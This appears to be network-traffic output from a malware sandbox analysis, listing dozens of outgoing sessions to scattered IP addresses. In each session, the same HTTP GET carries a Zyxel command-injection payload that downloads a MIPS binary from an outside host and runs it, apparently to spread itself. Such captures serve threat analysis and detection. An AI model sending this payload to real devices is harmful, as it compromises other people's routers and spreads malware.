                                                        4288192.168.2.1451028203.25.2.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921462059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4289192.168.2.144473440.216.157.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921516895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4290192.168.2.145664653.194.168.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921549082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4291192.168.2.1447704211.225.106.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921603918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4292192.168.2.143799268.131.51.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921626091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4293192.168.2.1450510212.181.35.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921665907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4294192.168.2.143717023.247.224.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921721935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4295192.168.2.1450242163.30.151.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921775103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4296192.168.2.1448772197.43.218.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921829939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4297192.168.2.1437232108.106.237.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921878099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4298192.168.2.1450800168.222.212.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921919107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4299192.168.2.1439780199.50.75.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921972036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4300192.168.2.145739093.192.27.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922029018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4301192.168.2.145813449.205.118.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922068119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4302192.168.2.143631291.76.26.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922103882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4303192.168.2.14392181.203.24.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922152042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4304192.168.2.1459634221.109.44.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922188997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4305192.168.2.1449926185.201.32.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922214985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4306192.168.2.1433450148.73.63.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922278881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4307192.168.2.144572095.114.27.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922327042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4308192.168.2.1439434105.155.197.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922342062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4309192.168.2.144827435.150.32.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922413111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4310192.168.2.1438210166.86.173.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922454119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4311192.168.2.145890231.79.163.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922507048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4312192.168.2.1435574212.98.181.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922544956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4313192.168.2.1444648172.11.0.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922595978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4314192.168.2.1434724163.144.52.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922648907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4315192.168.2.1449650206.226.100.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922693968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4316192.168.2.1449122110.117.168.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922741890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4317192.168.2.145165498.168.245.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922758102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4318192.168.2.1433294188.253.240.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922801971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4319192.168.2.1443452178.77.7.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922844887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4320192.168.2.1446638105.36.153.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922895908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4321192.168.2.1441356137.67.121.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922940969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4322192.168.2.143277462.87.74.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.922981977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4323192.168.2.1455656129.192.127.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923028946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4324192.168.2.144314499.36.121.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923062086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4325192.168.2.1439596141.69.122.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923110962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4326192.168.2.1436626139.92.147.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923140049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4327192.168.2.1435044123.88.42.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923192024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4328192.168.2.144764666.214.18.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923217058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4329192.168.2.145953873.116.58.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923331976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4330192.168.2.1438672183.232.134.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923367977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4331192.168.2.143998454.106.243.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923404932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4332192.168.2.1449674124.197.235.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923458099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4333192.168.2.1444878139.190.213.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923505068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4334192.168.2.1433620162.103.11.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923516035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4335192.168.2.1439020170.51.158.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923559904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4336192.168.2.146011266.189.146.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923593998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4337192.168.2.1456804144.101.209.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923638105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4338192.168.2.1437058180.65.176.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923664093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4339192.168.2.1451408132.19.164.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923712015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4340192.168.2.1434108169.200.221.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923770905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4341192.168.2.1449074145.36.188.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923818111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4342192.168.2.1448688108.147.175.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923866034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4343192.168.2.145701096.117.0.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923883915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4344192.168.2.1460568168.17.89.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923909903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4345192.168.2.1458606196.75.100.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923949957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4346192.168.2.1453318117.2.41.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.923991919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4347192.168.2.1448204180.150.248.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924046040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4348192.168.2.1433778176.43.33.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924103975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4349192.168.2.1453442115.31.120.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924132109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4350192.168.2.1444378136.199.234.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924177885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4351192.168.2.144804060.119.62.22443
